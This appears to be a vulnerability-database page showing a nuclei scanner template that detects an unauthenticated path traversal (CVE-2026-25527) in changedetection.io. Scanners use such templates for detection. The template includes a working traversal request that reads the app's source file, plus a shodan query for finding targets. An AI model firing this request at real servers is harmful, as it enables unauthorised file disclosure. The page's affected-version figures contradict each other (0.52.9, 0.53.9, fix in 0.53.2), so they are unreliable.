Lucene search
+L

changedetection.io <= 0.52.9 - Unauthenticated Path Traversal

🗓️ 27 Jul 2026 04:16:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Unauthenticated path traversal in changedetection.io allows reading local files; upgrade to 0.53.2+.

Related
Refs
Code
id: CVE-2026-25527

info:
  name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal
  author: WRG-11
  severity: medium
  description: |
    changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.
  impact: |
    Unauthenticated attackers can read local application source files, potentially exposing sensitive information.
  remediation: |
   Upgrade to version 0.53.2 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25527
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-25527
    epss-score: 0.0092
    epss-percentile: 0.56609
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: dgtlmoon
    product: changedetection.io
    shodan-query: http.html:"changedetection.io"
  tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure

http:
  - raw:
      - |
        GET /static/%2e%2e/flask_app.py HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "from changedetectionio", "def static_content(")'
          - 'contains(content_type, "text/x-python")'
        condition: and
# digest: 490a004630440220216f3f0e26d4e85d874d98ce7bcde1db0b7980319ff1721c8776caa526bc2b37022026e11a8b50f675817d6ab80685f73c1f53ca78043442366e847aefc730f5edbb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jun 2026 01:02Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.3
EPSS0.0092
SSVC
15